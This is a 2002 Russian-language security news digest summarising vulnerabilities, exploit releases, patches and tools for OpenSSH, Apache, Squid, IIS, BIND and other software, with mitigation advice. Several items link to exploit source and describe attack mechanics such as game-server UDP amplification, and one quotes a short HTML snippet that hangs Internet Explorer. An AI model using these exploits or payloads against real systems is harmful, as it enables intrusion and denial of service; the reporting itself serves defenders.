5/07/2002 Баг в сервисе терминалов Windows 2000 RUS.
В адрес bugtraq@security.nnonv.ru пришло сообщение от Фролова Олега ака XYZ Moscow. Приводим его дословно: "Если окно клиента минимизировано, то консоль на сервере не лочится по тайм-ауту. То есть, если на клиентской станции не стоит скринсервер с паролем, то возможно получить постороннему неавторизованый доступ к серверу". Баг найден в клиенте сервиса терминалов в Windows 2000 RUS Biuld 2195. Исчточник - список рассылки security.nnov.ru
5/07/2002 Игроманы могут быть полезны для хакерских атак.
Как пишет в письме BUGTRAQ Auriemma Luigi сервера для игры в Unreal Tournament могут быть использованы в качестве источников проведения атак типа DDoS (распределённый отказ в обслуживании). При посылке всего одного пакета к серверу от в ответ посылает множество пакетов к каждому хосту. При работе сервера игры используют для "работы" по сети протокол UDP, который обычно не проверяет приём и передачу принятых/отправленных пакетов (хотя подобные средства проверки всё-таки существуют), а также источник посылаемого пакета. Таким образом, некий злоумышленник может, послав от имени "жертвы" всего ОДИН пакет на порт UDP 7777 вызывает со стороны сервера поток пакетов со скоростью 10 пакетов в секунду и длиной 46 байт в сторону компьютера "жертвы". Длительность такой посылки - 2 мин.30 сек. Через 2 мин. 30 сек злоумышленник повторяет атаку. Кроме того на КАЖДЫЙ из таких пакетов компьютер "жертвы" посылает ICMP-пакет "port unreacheable". Кроме того, порт отправителя ("жертвы") тоже может варьироваться. Количество серверов игры по всему миру огромно-можно послать запрос на несколько серверов. Последствия подобной атаки для dial-up пользователей очевидны. Автор также выпустил эксплоит. Подробности - http://online.securityfocus.com/archive/1/280544/2002-07-01/2002-07-07/0 Эксплоит - http://www.security.nnov.ru/files/ut.tgz
5/07/2002 Проект OpenBeOS.
Данный проект создан для воссоздания почти вымершей операционной системы BeOS (Be Operating System). Напомним, что компания, которая разрабатывала BeOS (Be Inc.)перепродавалась из рук в руки. С 2001 г. операционной системой(и ее интеллектуальной собственностью) владеет компания Palm, но дальнешее развитие этой операционной системы на платформах PC никак не прогнозируется. До своего уничтожения компания Be Inc. успела создать новое сетевое ПО (BeOS Networking Environment или BONE), которое обновляло ОС до версии R5. Также велись работы над новой версией BeOS под названием Dano, однако ни один из этих проектов не был представлен широкой публики. Группа энтузиастов решила воссоздать обе системы, но уже с открытым кодом. Название проекту было дано OpenBeOS. На данный момент выпущен первый релиз R1 для платформы x86. Ведутся работы по портированию на другие платформы. Уже собралась команда из 214 энтузиастов, которая и занимается разработкой системы с нуля. Пока что, команда не добралась до графического интерфейса, но судя по обновлениям на сайте, работа у них кипит. Ядро OpenBeOS базируется на NewOS (микроядро от Трэвиса Гейсельбрехта - бывшего инженера Be Inc.). Распространяется на условиях MIT-лицензии. Сайт проекта - http://open-beos.sourceforge.net
5/07/2002 Интересная программа: NetSearch.
Программа NetSearch предназначена для поиска компьютеров, шарингов, папок и файлов в локальной сети. Отличительная особенность – нахождение скрытых шарингов на компьютере. Количество используемых программой ресурсов и интерфейс полностью настраиваемый. Домашняя страничка программы: http://zya.at.tut.by
4/07/2002 Очередное дополнение в описание уязвимости в OpenSSH.
Группа Global InterSec LLC выпустила очередной подробный анализ уязвимости, обнаруженной в OpenSSH (подпрограмма challenge-response). Как указывается в их отчёте природа уязимости кроется на BSD платформах потому, что на них приложение компилируется с флагом -with-bsd-auth и переполнение присутствует в вызове функции input_userauth_info_response(). На Linux-системах же компиляция обычно выполняется с флагом --with-pam и переполнение получается при применении функции input_userauth_info_response_pam(). Анализируется также работа эксплоита и приводится рекомендации для систем с PAM-автризации выставить в файле /etc/ssh/sshd_config следующие параметры: PAMAuthenticationViaKBDInt no и KbdInteractiveAuthentication no. Однако это не значит, что не нужно апгрейдит OpenSSH. ПРиводятся также ссылки на различные рекомендации производителей как различных дистрибутивов Linux, так и на NetBSD. Подробности - http://www.globalintersec.com/adv/openssh-2002062801.txt
4/07/2002 Выход Squid-2.4.STABLE7.
3 июля Хенрик Нордстром-один из разработчиков прокси-сервера SQUID анонсировал выход новой версии своего продукта. Как указывается в анонсе в новой версии SQUID убраны различные "дыры", которые могут привести к взлому сервера: уязвимости в Gopher-клиенте, правильный разбор содержимого FTP-директории и FTP-данных (введена новая директива ftp_sanitycheck), убрана возможность переполнения буфера в MSNT auth helper и прочие багофиксы. Всем администраторам SQUID настоятельно рекомендуют обнровиться до этой версии, так как уязвимости в Gopher-клиенте и разборе FTP-директории поддерживают удалённое выполнение кода. Выпущены также индивидуальные патчи для версии Squid-2.4.STABLE6. Подробности - http://www.squid-cache.org/Advisories/SQUID-2002_3.txt
4/07/2002 Уязвимость в SunPCi II VNC.
SunPCi II - это дополнительная плата расширения для слота PCI платформы SPARC, предназначенная для запуска ОС Windows и Win32-приложений на процесссоре Intel Celeron. Начиная с версии 2.3 драйверов для этой платы Sun включает модифицированную версию AT&T VNC (Virtual Network Computing-средство для построения виртуальных сетей)-входит в состав пакета SUNWspvnc. При этом был модифицирован и сам механизм авторизации между клиентом и сервером VNC. Новая схема авторизации позволяет злоумышленнику легко вычислить пароль исполизуемый при авторизации (который обычно является также и паролем пользователя в Solaris), просто прослушав траффик между клиентом и сервером VNC. Уязвимы SPARC-платформы Solaris 2.6, 7, 8. Подробности - http://www.trust-factory.com/TF20020601.html
4/07/2002 Уязвимость в Microsoft Commerce Server 2000/2002.
NGSSoftware обнаружила обнаружила уязвимость в Microsoft Commerce Server версий 2000, 2002 (ОС-WinNT, Win2K, XP). Commerce Server фирмы Microsft-это Веб-сервер, предназначенный для построения сайтов электронной коммерции (e-commerce). Этот продукт содержит инструменты и средства для упрощения разработки развёртывания сайтов электронной коммерции. Дэвид и Марк Литчфильды из NGSSoftware обнаружили возможность удалённого перезапуска буфера (buffer overruns) с возможностью выполнения команд в контексте безопасности локального эккаунта SYSTEM. Уязвимость кроется как во многих ошибках исходного кода продукта(Profile Service), так и в инсталляторе пакетов OWC (Office Web Components), применяемом в Microsoft Commerce Server. Для выполнения команды она должна быть подана на OWC package installer как входной аргумент с опцией '/C'. Microsoft выпустил патчи для обоих версий Commerce Server. Подробное описание и ссылки на патчи - http://www.ngssoftware.com/advisories/ms-comsrvr.txt
4/07/2002 Вышел релиз KDE 3.0.2.
Группа разработчиков менеджера рабочего стола KDE для UNIX сообщила о выпуске 2 ибля обновленной версии KDE 3.0.2. Данный релиз, по заявлению KDE Project, направлен на исправление ошибок, обнаруженных с момента выпуска третьей версии пакета программ. Кроме того, была улучшена стабильность программного продукта в целом. Для того чтобы сделать KDE 3 стабильнее, разработчики внедрили в пакет программ некоторые нововведения из разрабатываемой ныне версии KDE 3.1. Всем пользователям KDE 3 рекомендуется обновить менеджер рабочего стола до версии 3.0.2. Загрузить KDE 3.0.2 можно с одного из сайтов-зеркал с дистрибутивами пакета программ. Подробности - http://www.kde.org/announcements/announce-3.0.2.html
3/07/2002 Cтатья "Следы атак по 80 порту: исследование сигнатур атак".
Securitylab.ru снова порадовал хорошей статьёй, написанной Михаилом Разумовым. Вот краткое описание. Порт 80 является стандартным для web-сайтов и может иметь много различных проблем безопасности. Эти дыры могут позволить хакеру получить административный доступ к web-сайту, или даже к самому web-серверу. В этой статье рассмотрены некоторые сигнатуры, характерные для таких атак, а также то, что следует искать в логах. Статья - http://www.securitylab.ru/?ID=31732
3/07/2002 Хакерская конференция H2K2 в Нью-Йорке.
12-14 июля в Нью-Йорке будет проходить хакерская конференция, оганизованная энтузиастами и группой 2600. Основные темы: "Crypto for the Masses," "Databases and Privacy," "Educating Lawmakers - Is It Possible?," "Secure Telephony." Также могут быть интересны следующие темы: "Access Control Devices", "Black Hat Bloc", "Caller ID Spoofing", "Fun With 802.11b", "Magic Lantern and Other Evil Things". Регистрация участников будет закрыта в конце этой недели. Подробнее - http://www.h2k2.net
3/07/2002 Удалённый эксплоит для OpenSSH.
Известная своими многочисленными эксплоитами группа GOBBLES Security опубликовала исходный код для удалённого эксплоита, использующего недвано обнаруженную уязвимость в популярном пакете OpenSSH. Работает с версиями 2.9.9-3.3. Исходный код эксплоита - http://www.security.nnov.ru/files/sshutup-theo.tar.gz
3/07/2002 Рекомендации по настройке OpenSSH для Red Hat Linux.
Kurt Seifried, специалист по безопасности, поддерживающий пакет OpenSSH выпустил рекомендации по настройке rpm-пакета OpenSSH 3.4p1 (релиз, вышедший после обнаружения уязвимости в OpenSSH). Также приведены рекомендации по настройке SPEC-файла. Самая ценаая рекомендация содержится в этой фразе: "Please for the love of all that is holy DO NOT DEPLOY ON REMOTE PRODUCTION SERVERS UNTIL YOU HAVE TESTED IT ON A LOCAL MACHINE." Подробности - http://seifried.org/security/os/linux/redhat/20020701-rh7x-openssh-34.html
3/07/2002 Buffer Overflow in Multiple DNS Resolver Libraries.
Найдена уязвимость(переполнение буфера) в библиотеках, на которых основаны некоторые DNS серверы, прежде это касается широко используемого BIND. С помощью данной уязвимости возможно запустить собственный код удаленно или просто устроить DoS. Настоятельно советуется всем администраторам обновить BIND. Подробности: http://www.cert.org/advisories/CA-2002-19.html
3/07/2002 Новый интересный инструмент: IE'en.
Эта программа, по сути дела, является клинетской частью трояна(хотелось бы отнести эту программу к семейству троянчатых). Но это не обычный троян, он работает по протоколу DCOM(The Distributed Component Object Model), и позволяет полностью контролировать любые действия в Internet Explorer на удаленной машине, при этом ничего не потребуется загружать на эту удаленную машину. Более того, эта программа может ловить пароли, даже те, которые передаются по SSL соединению(Hotmail). Однако, не все так просто, поэтому программа не годится для использования кухацкерами - дла удаленного управления с помощью этой программы необходимо знать учетное имя и пароль к нему на удаленной машине. Скачать IE'en: http://www.securityfriday.com/ToolDownload/IEen/ieen_doc.html
2/07/2002 Jrun sourcecode Disclosure.
Найдена возможность получить исходные коды с Jrun веб сервера. Существует несколько сочетаний, которые заставляют веб сервер отображать .jsp файлы без предвартилеьной обработки(парсинг). Проблемма заключена в обработке нулевых символов, например, если в конце запроса добавить нулевой символ в UNICODE, то веб сервер отобразит исходник .jsp файла вместо его запуска. Подробности: http://online.securityfocus.com/archive/1/280062
2/07/2002 AccessDenied ScreenSaver v1.3 weak password encryption vulnerability..
ВНИМАНИЕ: Была обнаружена уязвимость в AccessDenied ScreenSaver, с помощью которой можно узнать зашифрованный пароль от самого скринсейвера. Убедительно просим всех обновить эту программу. Скачать обновленную версию 1.4 скринсейвера: http://www.uinc.ru/scripts/load.cgi?files/agapov25/accessd.exe Подробности уязвимости и эксплоит для получения паролей от версии 1.3: http://inbox.h1.ru/ad_passwd_adv.txt
2/07/2002 Sitespring Server Denial of Service.
Была найдена уязвимость в программе Macromedia Sitespring 1.2.0(277.1), позволяющая произвести DoS-атаку, которая может повлечь за собой отключение веб-сервиса и нарушение работы базы данных. Подробнее здесь: http://online.securityfocus.com/archive/1/280079
1/07/2002 В США была обнаружена группа подростков, которая занималась незаконным подключением к провайдеру Buckeye Cablesystem, путем модифицирования кабельных модемов для получения доступа через других пользователей этого провайдера.
Если вину удастся доказать, им грозит от 1 до 5 лет тюрьмы.Подробнее: http://www.compulenta.ru/2002/6/28/31577/
1/07/2002 Scanning for SSH Can Cause a Crash.
В результате использования exploitа, основаного на уязвимости "SSH CRC32 attack detection code contains remote integer overflow", возможно проведение DoS-атаки на SSH модуль, что приведет к перезагрузке. Подвержено все оборудование основанное на Cisco IOS ПО, которое поддерживает SSH, а также Cisco PIX Firewall, Cisco 11000 Content Service Switch family и Catalyst 6000 свитчи на CatOS. Подробнее: http://online.securityfocus.com/archive/1/279308
30/06/2002 Opera 6.04.
Вышла новая версия популярного браузера Опера. Качать здесь: ftp://ftp.opera.com/pub/opera/win/604/en/
30/06/2002 Zebedee: Secure IP tunnel.
Zebedee - это пакет для создания зашифрованных tcp или udp туннелей между двумя системами. Кроме того, Zebedee умеет сжимать данные перед отправкой, тем самым снижая нагрузку на сеть. Этот пакет по функциональности не превосходит ssh, SSL или FreeS/WAN, но он намного проще в установке, настройке и поддержке и будет очень полезен, когда нужно быстро создать безопасное соединение. Домашняя страничка программы: http://www.winton.org.uk/zebedee/
30/06/2002 Бюллетень по безопасности от CERT: Уязвимость во многих реализациях резолвера (DNS).
Как и положено, CERT среагировал на появление информации об уязвимости в реализациях библиотек резолвера (преобразование имён) DNS. Подробности - http://www.cert.org/advisories/CA-2002-19.html
30/06/2002 Дополнение к предыдущей новости.
Mihai Moldovanu из Румынии дизассемблировал код червя. Подробности по ссылке. Подробности - http://projects.tfm.ro/security/apache_worm/
30/06/2002 Интернет-червь, использующий уязвимость Апача.
Domas Mituzas из Central Systems (судя по всему, Литва) объявил, что их honeypot-система (что-то типа приманки для "хакеров") была заражена червем, который использует уязвимость, недавно найденную в Вэб-сервере Apache. Принимает команды на 2001 порт UDP и ведёт себя аналогично DDoS-пакетам. Исходники прилагаются. Подробности - http://dammit.lt/apache-worm/
29/06/2002 OpenSSH Vulnerabilities in Challenge Response.
Информационный центр CERT оповещает, что код в SSH отвечающий за ответы на вызовы(challenge response) содержит две уязвимости. Данные недочеты позволяют получать полный доступ к эккаунту с которого запущен sshd (обычно root). Первая уязвимость повлияла на OpenSSH от версии 2.9.9 и до 3.3, в которых включен challenge response и которые используют SKEY или BSD_AUTH аутентикацию. Вторая уязвимость повлияла на PAM модули, которые используют интерактивную клавишную аутентикацию в OpenSSH от версии 2.3.1p1 и до 3.3, вне зависимости от включенного challenge response. Подробности: http://www.cert.org/advisories/CA-2002-18.html
29/06/2002 Анонс: The First Annual Computer Security & Intelligence Conference (CSICON).
Конференция пройдет с 19 по 21 Августа в The Hyatt Regency(Calgary, Alberta, Canada). Окончательный список выступающих уже составлен, предварительная регистрация заканчивается 15го Июля. Среди главных выступающих, на конференции будут представлены следующие организации: BindView Corporation, WooWoo, Qualys Inc., University of Texas, Seccuris, Fate Labs, Entrench, TSIntel, Cinnabar, EntrenchTech, BindView и Symantec. Спонсоры конференции: Entrench Technologies, VulnWatch и Syngress Media. Цена участия в данной конференции: $1,545 до 15 Июля и $1,750 после. За дополнительной информацией обращайтесь на официальный сайт конференции: http://www.csicon.net Распорядок выступлений на конференции опубликован здесь: http://www.csicon.net/schedule.pdf
29/06/2002 Новый документ: Violating Database Enforced Security Mechanisms.
Автор затрагивает тему "runtime patching" эксплоитов, на примерах Microsoft SQL Server 2000. Однако, описываемые методы работают и на других системах. Также, документ содержит описание трехбайтового патча для SQL сервера, который может позволить получить доступ к системе с правами администратора. Подробнее: http://www.ngssoftware.com/papers/violating_database_security.pdf
28/06/2002 Бесплатный семинар Microsoft, Aladdin, Softline.
Компании Microsoft, SoftLine и Aladdin приглашают вас принять участие в семинаре "Корпоративная безопасность в среде Windows 2000" Семинар состоится 9 июля 2002 г. в 9.00 в конференц-зале Математического института им. В.А. Стеклова На семинаре вы сможете узнать об основных механизмах защиты корпоративных сетей средствами Windows 2000. Речь пойдет об аутентификации пользователей, разграничении доступа и методах защиты информации. Алексей Афанасьев расскажет об электронном ключе eToken, выпускаемым компанией Aladdin. На семинаре выступят ведущие специалисты компаний Aladdin, SoftLine. Участники семинара получат методические материалы. Участие в семинаре БЕСПЛАТНОЕ. Для участия необходимо ОБЯЗАТЕЛЬНО зарегистрироваться - http://www.softline.ru/seminar.asp?... Схема проезда - http://www.softline.ru/seminar.asp?...
28/06/2002 Удалённая уязвимость в коде резолвера libc.
Joost Pol из Нидерландов обнаружил уязвимость в коде резолвера бибилиотеки libc. Уязвимость присутствует в ОС FreeBSD, OpenBSD, NetBSD. Наличие уязвимости позволяет злоумышленнику определённым пакетом сымитировать ответ DNS-сервера на запрос gethostbyname. Подробности - http://www.pine.nl/advisories/pine-cert-20020601.txt
28/06/2002 Патчи для ядра FreeBSD и OpenBSD.
Michael A. Williams анонсировал патч для ядер ОС FreeBSD и OpenBSD под названием signed_exec. Задача патча предотвратить возможность установки руткитов. Цитата от автора: "the idea is to not allow a Trojaned binary to execute under the guise of a valid program, shared library or loadable kernel module". В настоящий момент автор также ведёт работу над аналогичными патчами для ОС GNU/Linux и NetBSD. На создание подобной заплатки автора подвиг выпуск GOOBLES эксплоита apache-scalp.c. Подробности - http://www.trojanproof.org
28/06/2002 Руководство по написанию безопасных Вэб-приложений.
Группа OWASP(Open Web Application Security Project) анонсировала первый релиз руководства по написанию безопасных Вэб-приложений. Документ доступен в PDF-формате (1.67 МБ) и в HTML. Cостоит из 80 страниц и подробно описывает наиболее типичные уязвимости Вэб-приложений: cross site scripting, cookie poisoning, SQL injection. Описаны также приложения WebScarab - сканер уязвимости Вэб-приложений и WebMaven - пакет, помогающий писать надёжные Вэб-проекты. Страница OWASP - http://www.owasp.org
28/06/2002 Уязвимость в IRIX-утилита pmpost.
В утилите pmpost, которая предназначена для оценки производительности Co-Pilot обнаружена уязвимость, которая позволяет локальному пользователю манипулировать важными системмными файлами, что может привести к получению прав суперпользователя. SGI Inc. выпустила бюллетень для устранения уязвимости. pmpost входит в состав пакета pcp_eoe.sw.eoe (Performance Co-Pilot package) и не устанавливается по умолчанию в IRIX 6.5. Для нейтрализации уязвимости рекомендуют выполнить команду: /sbin/chmod 555 /usr/pcp/bin/pmpost (рутом, конечно). Подробности - http://www.securityfocus.com/archive/1/191831
28/06/2002 Выход Gnome 2.0.
Наконец-то вышел так ожидаемый релиз оболочки Gnome. Если читать пресс-релиз, то ничего интересного понять не удасться - "мы стали лучше, удобнее и красивее". Но в принципе, пресс-релизы для этого и не предназначены. Для оценки красоты предназначены скриншоты. Автор новости-multik с linuxnews.ru Подробности - http://gnome.org/pr-gnome20.html Скриншоты - http://gnome.org/start/2.0/screenshots/index.html
28/06/2002 Что случилось с linux.org.ru (вторая часть).
По сведениям из достоверных источников на сервере, где находится linux.org.ru сгорела материнская плата. Скорее всего уже сегодня все будет работать. Информация получено от Stanislav. Источник - http://linuxnews.ru/forum/index.php?id=23752&thread=23752
27/06/2002 Почему недоступен www.linux.org.ru?.
Со вчерашнего дня стал недоступен крупнейший ЛИНУКС-сайт-linux.org.ru. До сих пор сетевому сообществу не понятна причина недоступности сайта. Некоторые люди это связывают с критикой сайта Путина.... Источник - http://www.linux.org.ru
27/06/2002 Уязвимость в mod_ssl.
Обнаружена уязвимость в модуле для Апача mod_ssl 2.4.9. уязвимость связана с функцией rewrite_command, которая применяется модулем mod_ssl-моудлем, который в некорой степени поддерживает криптографию через Апач. источник- http://www.Jedi.Claranet.Fr/
26/06/2002 Solar Designer выпустил патч для "дыры" в SSH.
После всех перипетий с удаленной уязвимостью в SSH Solar Designer выпустил очередные патчи. Выпущена версия OpenSSH 3.3p1. Подроьноости - http://www.citi.umich.edu/u/provos/ssh/privsep.html
26/06/2002 Подробности про OpenSSH-уязвимость.
Сегодня наконец-то вышло информационное письмо от IIS, раскрывающее завесу тайны над уязвимостью в OpenSSH. Напомним, что ранее по спискам рассылки проходили всякие слухие о том, что Teo De Raadt и ISS работают над некой уязвимостью в OpenSSH. IIS cегодня выпустила уведомление с подробным описанием этой уязвимости. Оказывается-уязвимость существует внутри аутентицикационного механизма "challenge-response" демона sshd. Более подробно - http://www.openssh.com/txt/iss.adv
26/06/2002 Уязвимость в IE в Win2K/XP.
Как утверждает 'ken'@FTU существует возможность завесить IE в ОС Win2K/XP при посылке кода <object ID="dosIE-doe" CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object> Фирма Майкрософт ответила в присущем её духе "Suppose a flaw in a web browser could be misused by a web site to "hang" the browser of any user who visited the site. If the user were able to resume normal operation by stopping the browser, restarting it, and avoiding the attacker's web site in the future, the flaw would not constitute a security vulnerability." Источник - http://www.securityfocus.com
25/06/2002 wIndependance Day.
Информация получена с сайта www.bugtraq.ru от dl. DesktopLinux.com объявил 4 июля днем независимости от Windows и в рамках празднования первого такого дня 4.07.2002 проводит конкурс эссе на тему "Как я избавился от Windows". Писать, кстати, придется только о Linux (FreeBSD, QNX, Solaris и проч. на избавление от Windows не тянут). Для облегчения участия русскоязычных эссеистов официальный сайт конкурса в России, nomicrosoft.ru, объявляет предварительный русский этап конкурса, который завершится 2 июля. За 3 июля жюри это дело просмотрит, и десять лучших работ будут переведены на английский язык, после чего уйдут на "большой" конкурс. Кроме того, первые три места на российском конкурсе тоже получат призы. Времени осталось немного, так что дерзайте :) Подробности - http://www.nomicrosoft.ru/wInDep.phtml
25/06/2002 Статья "SQL Injection для чайников, взлом ASP+MSSQL".
На сервере securitylab.ru появилась довольно любопытная статья с названием "SQL Injection для чайников, взлом ASP+MSSQL". Эта статья предназначена для того, чтобы помочь новичкам справиться с проблемами, с которыми они могут столкнуться при использовании техники SQL Injection, успешно использовать ее и уметь защитить себя от подобных нападений. SQL Injection - метод, предназначенный для введения SQL запросов/команд через web-страницы. Многие web-страницы используют параметры, представленные Web пользователям, и делают SQL запрос базы данных. Подробнее - http://SecurityLab.ru/?ID=31623
25/06/2002 Эксплоит для IIS 5.0 ASP.DLL.
Эксплоит, реализующий переполнение буфера в .asp Microsoft IIS 4(NT4) and - IIS 5(Windows 2k). Работает на IIS5 Chinese SP0, SP1, SP2 и English SP2 MS Windows. Связывает оболочку на 7788 порту. Исходный текст - http://www.securitylab.ru/?ID=31682
25/06/2002 Удалённая уязвимость в OpenSSH.
Согласно сообщению из Debian Security, Theo de Raadt объявил о том, что OpenBSD team работает над устранением remote exploit в OpenSSH. В OpenBSD team отказались сообщить более подробные сведения об уязвимости. Поэтому рекомендуется обновить OpenSSH до последней выпущенной версии 3.3. В ней появились некоторые особенности, позволяющие сократить возможность использования уязвимости, однако в ней не решена сама проблема уязвимости и некоторые ранее известные проблемы (compression does not work on all operating systems since the code relies on specific mmap features, and the PAM support has not been completed). В настоящее время ведутся работы над выделением непривилегированного процесса, который будет выполнять большую часть работы, что позволит сократить риск взлома. Информация получена от dendy с сайта linux.org.ru. Подробности - http://www.debian.org/security/2002/dsa-134
25/06/2002 Майский выпуск Linux Gazette.
Вышел перевод майского выпуска Linux Gazette #78. Представлены следующие статьи: Программирование GUI в C++ с использованием библиотеки Qt, часть 1 (автор - Gaurav Taneja), Программирование с Xlib на C++ (автор - Rob Tougher), Быстрая разработка приложений при помощи PyGTK (автор - Krishnakumar R.), Weekend mechanics -- Выходные под капотом вашего Linux'а (автор - Thomas Adam). Перевод выполнен авторским коллективом русского зеркала Linux Gazetter - Андреем Киселёвым и Александром Куприным. Особый интерес может представлять последняя статья Томас Адама. В ней содержатся краткие введения в Squid, SquidGuard, пример скрипта на bash для резервного копирование и краткое описание отличнного текстового редактора Nedit. Ссылка на газету - http://gazette.linux.ru.net/lg78/index.html
24/06/2002 Apache Chunked Scanner v1.0.2 .
Ну вот наконец появился сканер, который тестирует удалённые Вэб-сервера на наличие Apache Chunked Encoding overflow. Создан eEye, известной своим сканером уязвимости Retina. Также рекомендуем посмотреть на сайте eyee сканеры червей SQL, Nimda и CodeRed (доступны в разделе Tools). Описание - http://www.eeye.com/html/Research/Tools/apachechunked.html
24/06/2002 FreeBSD 4.6-RELEASE.
Чуть запоздалая новость. 15 июня Bruce A. Mah анонсировал выход новой версии популярной операционной системы FreeBSD версии 4.6. Это самая последняя версия STABLE-ветки. Изменений довольно много, но самое основное, по словам Брюса, это то, что в качестве основной системы XWindow взята XFree86 4.2.0. По прежнему поддерживаются только Intel и Alpha-платформы. Подробности и ссылки - http://www.freebsd.org/releases/4.6R/announce.html
24/06/2002 Уязвимость в Pirch98.
David D. Rude II обнаружил уязвимость в Pirch98-популярном IRC-клиенте для Win32. Переполнение буфера, которое может возникнуть при экплуатации этой уязвимости может привести к возможности выполнения удалённых команд. Уязвимость связана с некооректной обработкой гиперссылок, которые указывают на другие каналы, либо на www-сайты. Проявляется при приёме сообщений на канале либо в привате. В DCC она не присутствует. Однако, как замечает автор реальное применение этой уязвимости довольно затруднительно, хотя и не невозможно. Пользователям Pirch Рекомендуется скачать крайнюю версию этого IRC-клиента с сайта www.pirch.com. Подробности - http://www.security.nnov.ru/search/document.asp?docid=3122
24/06/2002 BlowChunks - модули для защиты Apache.
Cris Bailiff из /dev/secure Pty Ltd написал два модуля для Apache, задача которых отклонять chunk-запросы к Вэб-серверу до того, как они попадут на вход уязвимых подпрограмм (напомним, что как раз с некорректной обработкой Apache chunk-запросов связана крайняя уязвимость в этом Вэб-сервере) и посылать информацию об этих запросах в лог-файл. Это позволяет администраторам серверов чувствовать себя в безопасности до обновления Apache. Как утверждает автор, отклонение этих запросов никак не влият на работоспособность сервера, так как большинство серверов и приложений в них не нуждаются (а многими броузерами они даже не поддерживаются). Исключение могут составлять только клиенты, которые не знают окончательной длины файлов для аплоада на сервер (что является довольно редкой ситуацией). Первый модуль написан на Перл и предназначен для серверов с включённым модулем mod_perl. Для включения модуля в сервер достаточно вставить содержимое модуля в файл httpd.conf либо включить содержимое файла директивой Include. Второй модуль написан на Си и требует для подключения компиляции Apache c поддержкой DSO (Dinamic Shared Object) и наличия AXPS (APache eXtenSion). Узнать это можно, выдав команду httpd -l - наличие mod_so говорит о включённой поддержке DSO. Cобственно, все рекомендации содержатся внутри модулей. BlowChunks на Перле - http://www.devsecure.com/pub/src/BlowChunks.pl BlowChunks на Си - http://www.devsecure.com/pub/src/BlowChunks.с
24/06/2002 Hacking CGI - security and exploitation.
Для интересующихся безопасностью CGI-скриптов, написанных на Перл-рекомендуется сайт b0iler. На самом сайте представлены следующие разделы: синтаксис CGI, проблемы с Перлом в качестве CGI, примеры уязвимых скриптов, вопросы-ответы. Рекомендуется к ознакомлению CGI-программистам, системным администраторам и исследователям в области сетевой безопасности. Hacking CGI - http://b0iler.eyeonsecurity.net/tutorials/hackingcgi.htm
24/06/2002 DoS в AdvServer.
AdvServer - Вэб-сервер для Win32 платформы, выпускаемый http://gamecheats.ws. В версии 1.030000 была обнаружена возможность проведения DoS-атаки. DoS возникает при посылке около 100 запросов, содержащих строку CRLF (возврат каретки, перевод строки). Подробности - http://elaboration.8bit.co.uk/projects/texts/advisories/AdvServer.DoS.txt
24/06/2002 Удалённый эксплоит для Apache на 32-битной архитектуре существует.
Именно с таким заголовком вышел 20 июня информационный бюллетень Apache Software Foundation. В вышедшем ранее бюллетене по безопасности утверждалось, что удалённый эксплоит возможен только для 64-битной архитектуры (IA-64). Поводом для выхода уточнённого бюллетеня стал выпуск группой GOBBLES эксплоита под названием apache-scalp.c. Apache Software Foundation настоятельно рекомендует всем администраторам, обслуживающим Вэб-сервер Apache обновить версию до 1.3.26 и 2.0.39. Тем временем GOBBLES выпустили новый эксплоит, который работает на ОС Free/Net/BSD (ранее он работал только на OpenBSD) под названием apache-nosejob.c. Бюллетень - http://httpd.apache.org/info/security_bulletin_20020620.txt Эксплоит - http://www.security.nnov.ru/files/apache-nosejob.c
23/06/2002 Сайт президента не открылся хакерам.
Именно с таким заголовком 21 числа вышла заметка на www.gazeta.ru (автор-Руслан Тарасов). В ней идёт речь об открытии на http://www.kremlin.ru сайта президента. Дизайн самого сайта, честно говоря оставляет желать лучшего. В самой статье утверждается, что сайт президента подвергся атакам хакеров, НО! Вчитайтесь в эту шикарную фразу! "Все атаки на интернет-ресурс главы российского государства были успешно пресечены. За безопасность сайта отвечает один дежурный чекист ФАПСИ". Страшно подумать, что бы произошло-не окажись на месте этого "дежурного чекиста"! Цитируем дальше. "Безопасность работы сайта и защита информации от искажений были самыми сложными и серьезными задачами, поставленными перед разработчиками сайта. Устройство системы безопасности президентского сайта, а также его серверная архитектура держится в строгом секрете". Чувствуется высокий "профессионализм" автора заметки, пишущего следующее: " Однако известно, что президентская виртуальная система безопасности имеет трехуровневую защиту. Она включает в себя "демилитаризованную" машинную зону (прим. ньюсмейкера - по видимому автор ТАК перевёл DMZ-DeMilitaryZone - граничную сеть, находящуюся между двумя брандмауэрами, на которой размещают обещдоступные сервисы) - решение, позволяющее обезопасить сервернуюю часть от внешнего и внутреннего враждебного воздействия, совмещенную операционную систему Windows/Unix (прим. ньюсмейкера - второй ляп, интересно, что автор тут имел в виду?), а также полный цикл сопровождения и маршрутизации документооборота (прим. ньюс-мейкера - "маршрутизация документооборота" - это просто перл! Без комментариев) на сайте, реализованный с помощью электронных цифровых подписей (ЭЦП)". Довольно примечательной является дискуссия, разгоревшаяся по поводу сайта президента на linux.org.ru-советуем посмотреть. Ссылка на "новость" - http://www.gazeta.ru/2002/06/21/sajtpreziden.shtml Дискуссия на LOR - http://www.linux.org.ru/view-message.jsp?msgid=203930&scroll=section&back=index.jsp
23/06/2002 Уязвимость в форуме YaBB.
В этом форуме присутствует Cross-Site Scripting уязвимость. При запросе для отображения определенного сообщения из форума, поле, которое указывает номер сообщения не фильтруется. Более того, если данный номер сообщения не существует, то выдается ошибка, где этот номер указывается в неотфильтрованном виде. Если вместо номера использовать ява скрипт в одну строчку, то при данном запросе, этот ява скрипт будет исполнен в браузере. Та же самая ситуация происходит и с любям другим кодом, который понимает браузер. Подробности: http://online.securityfocus.com/bid/5078
22/06/2002 Half-life fake players bug.
Обнаружена уязвимость в multiplayer сервере игры Half-Life. Есть возможность "забить" список игроков на сервере ложными именами, при этом администратор не сможет увидеть ни одного игрока в своем списке. Таким образом, другие, желающие поиграть на этом сервере не смогут этого сделать. Подробности и эксплоит: http://online.securityfocus.com/archive/1/277996/2002-06-19/2002-06-25/0
22/06/2002 Для защиты Путина в Канаде будут отключать сотовые телефоны.
Для обеспечения безопасности во время саммита "Большой восьмерки" 26-28 июня на высокогорном лыжном курорте Кананаскис в Канаде принято решение глушить сотовые телефоны. Такие меры будут приняты не только для обеспечения безопасности глав G8, среди которых российский президент, но и во время подготовки к июльскому визиту Папы Римского. Режим будет действовать 17 по 29 июня в Канаскисе и Калгари, где разместится пресс-центр и гостиница для дипломатов, и с 16-31 июля в Торонто. Источник: http://www.compulenta.ru/2002/6/22/31311/
22/06/2002 Боремся с нимдой и ее аналогами.
